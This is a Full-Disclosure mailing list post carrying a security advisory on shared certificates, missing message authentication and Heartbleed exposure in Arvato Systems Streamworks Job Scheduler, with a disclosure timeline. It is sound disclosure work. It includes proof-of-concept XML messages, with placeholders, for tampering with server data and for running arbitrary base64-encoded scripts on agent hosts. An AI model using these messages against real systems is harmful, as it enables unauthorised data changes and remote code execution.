lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20190114121745.Horde.D7mn_aRZeyNYS-MgQJwGZQ2@webmail.df.eu>
Date: Mon, 14 Jan 2019 12:17:45 +0100
From: Simon Bieber <sbieber@...uvera.de>
To: fulldisclosure@...lists.org
Subject: [FD] secuvera-SA-2016-01: Multiple authentication weaknesses in
 Arvato Systems Streamworks Job Scheduler


Affected Products
    Streamworks Job Scheduler Release 7 (older/newer releases have not  
been tested)

References
    Secuvera-SA-2016-01  
https://www.secuvera.de/advisories/secuvera-SA-2016-01.txt (used for  
updates)
    No CVE number could be assigned (vendor not listed under  
cve.mitre.org/data/board/archives/2016-01/msg00015.html)

Summary:
    Arvato Systems Streamworks Job Scheduler is a software product for  
automation purposes. It helps
    "to plan, maintain, control and monitor all of your automatable IT  
processes" (source: vendor product
    homepage). It consists of different types of services: an  
application server daemon, a processing
    server daemon that controls one or multiple agent daemins  
installed on operating servers were workload
    has to be done.

    During a penetration test at a customers site three weaknesses  
concerning communication
    authentication were discovered:

    1) All agents installed on server systems use the same X.509  
certificates and private key that
           were issued by the vendor for authentication.

    2) The processing server component does not check received  
messages properly for authenticity.

    3) Agents installed on servers do not check received messages  
properly for authenticity

    4) Agents and processing servers are vulnerable against TLS  
Heartbleed attack (CVE-2014-0160 -
       see https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0160)

Effect:
    1) If systems were compromised and authentication material is  
stolen, all certificates have to be
       revoked and replaced. In addition, this expands the effect of   
3) to the entire environment,
	  not just single systems.

    2) An attacker with knwolegde of the message syntax of the product  
and the authentication material
       is able to add, change or delete data within the Streamworks database.

    3) An attacker with knowledge of the message syntax of the product  
and the authentication material
       is able to create new or execute available jobs on servers with  
agents installed located within
	  the same network. This can lead to a complete loss of integrity,  
confidentiality or availability
	  of the respective system or data stored/processed on it.

    4) An unauthenticated remote attacker is able to read content  
within system memory.

Vulnerable components and scripts:
    Streamworks Job Scheduler Processing Server Release 7.1
    Streamworks Job Scheduler Agent Release 7.1
    older releases have not been tested

Examples:
    In the following, a sample to exploit 2) and 3) will be given.  
Replace Information within squared
    brackets:

    2) By sending a the following XML-Message to a Processing server  
it is possible to change system
    information of a legitimate configured client as proof-of-concept.  
The System OS Info was slightly
    changed:

    <AgentNotifyStarted ProcessId="7044" AgentVersion="3.1.36">
	<ComHeader Version="1.0">
		<MandatorCode>0100</MandatorCode>
		<MsgCreateTime>2016-02-24T10:26:11[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].745Z</MsgCreateTime>
		<MsgSendTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].963Z</MsgSendTime>
		<SourceEndpoint Address="0.0.0.0" Port="30000" SysId="[Hostname of  
legitimate Client]" />
		<DestinationEndpoint Address="[FQDN of Processing server]"  
Port="9600" SysId="[FQDN of Proces
		sing server]" />
		<Sequence>0</Sequence>
	</ComHeader>
	<SystemInformation>
		<OsType>Windows</OsType>
		<OsInfo>Pentest Windows!</OsInfo>
		<OsLocale>de_DE.windows-1252</OsLocale>
	</SystemInformation>
	<KnownJobsList>
	</KnownJobsList>
	<FileTransferOptions Mode="ALL" BlockSize="0" />
	<Cli CliOptions="Enabled" />
    </AgentNotifyStarted>


  -------------


    3) By sending a XML-Message of the following type to create and  
execute a new job on a system
    <ServerRequestStartJob>
     <ComHeader Version="0.1">
      <MandatorCode>0100</MandatorCode>
      <MsgCreateTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].1061367Z</MsgCreateTime>
      <MsgSendTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].1061367Z</MsgSendTime>
      <SourceEndpoint Address="[FQDN of processing server]"  
Port="9600" SysId="[FQDN of processing
	 server]" />
      <DestinationEndpoint Address="[IP of Server with agent  
installed]" Port="30000" SysId="[Hostname of
	 server with agent installed]" />
      <Sequence>1</Sequence>
      <MandatorId>0100</MandatorId>
     </ComHeader>
     <JobStartInfo>
       <JobInfo ServerJobId="118291965_1" ExecutionNo="1"  
PlanDate="[YYYY]-[MM]-[DD]"
	  StreamName="[NewStreamName]" JobName="[NewJobName]" Run="1" />
       <UserName>[Username under which the agent should run the  
Script, e.g. LOCAL\System]</UserName>
       <Password>[Add Password of the user if needed]</Password>
       <UseUserProfile>true</UseUserProfile>
       <MainScript>[base64-encoded Script code, e.g.  
"cmVtDQpDOlxXaW5kb3dzXE5vdGVwYWQuZXhl"
	  to start a notepad.exe on a Windows Host]</MainScript>
       <KeepJoblogDays>10</KeepJoblogDays>
     </JobStartInfo>
    </ServerRequestStartJob>

Solution:
    Install Streamworks Release 9.3
     
(https://it.arvato.com/de/solutions/it-solutions/lp/streamworks-release-9-3.html - page available  
in
	german only)

Disclosure Timeline:
    2016/05/12 vulnerabilities discovered
    2016/05/30 vendor initially contacted
    2016/06/13 sales representative replied
    2016/06/14 technically responsible contact details received
    2016/07/01 technical personnel contacted, appointment to discuss  
findings made
    2016/07/11 submitted technical details to responsible personnel
    2016/07/12 responsible product manager replied. Committed to  
extend disclosure timeline due to
               comprehensible reasons. New disclosure timeline: end of  
September 2016
    2016/09/08 product manager replied, suggest meeting to discuss fixes
    2016/09/27 meeting took place, half of the vulnerabilities were  
fixed. Timeline until disclosure extended
               again due to difficult changes. Disclosure timeline  
extended to end of April 2017
    2017/04/20 Contacted vendor again to remind of the near end of the  
disclosure timeline.
    2017/04/27 Reply and ongoing discussion about when the fix will be shipped.
    2017/05/20 Vendor replied that due to customers experience fewer  
releases were made. The fix will be shipped
               on the second quarter of 2018. Extended disclosure  
timeline until the end of June 2018.
    2018/04/03 Contacted vendor as reminder and to get a release ship date.
    2018/04/09 Vendor replied saying that within release 9.3 (shipped  
on 2nd quarter 2018) the issues will be fixed
               Final disclosure timeline: 2019/01/14 after a  
sufficient grace period to customers to install the fixed
               release
    2019/01/14 public advisory disclosure


Credits
	Simon Bieber, secuvera GmbH
	sbieber@...uvera.de
	https://www.secuvera.de

Disclaimer:
     All information is provided without warranty. The intent is to  
provide informa-
     tion to secure infrastructure and/or systems, not to be able to  
attack or damage.
     therefore secuvera shall not be liable for any direct or indirect  
damages that
     might be caused by using this information.




_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ